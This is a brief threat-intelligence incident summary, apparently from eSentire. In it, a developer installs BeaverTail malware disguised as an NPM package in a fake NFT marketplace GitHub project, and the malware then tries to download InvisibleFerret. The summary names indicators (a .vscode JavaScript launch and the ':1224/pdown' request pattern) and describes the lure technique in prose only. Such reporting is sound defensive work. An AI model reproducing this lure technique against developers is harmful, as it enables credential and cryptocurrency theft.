eSentire responded to a September 2024 incident in which a developer downloaded a malicious NFT marketplace project from GitHub and installed BeaverTail masquerading as an NPM package through Visual Studio Code. The package launched a JavaScript file from the .vscode folder and attempted to run cURL commands to download a Python executable and libraries associated with InvisibleFerret, but endpoint controls blocked the download before deployment was confirmed. TRU assessed the TTPs as consistent with North Korean Contagious Interview activity, citing overlap with Unit42 reporting, developer targeting, cryptocurrency-themed GitHub lures, and the observed p.zi and :1224/pdown request pattern. The case matters because it shows the campaign continuing to use software-development workflows and fake project lures to reach developer systems before attempting follow-on backdoor installation.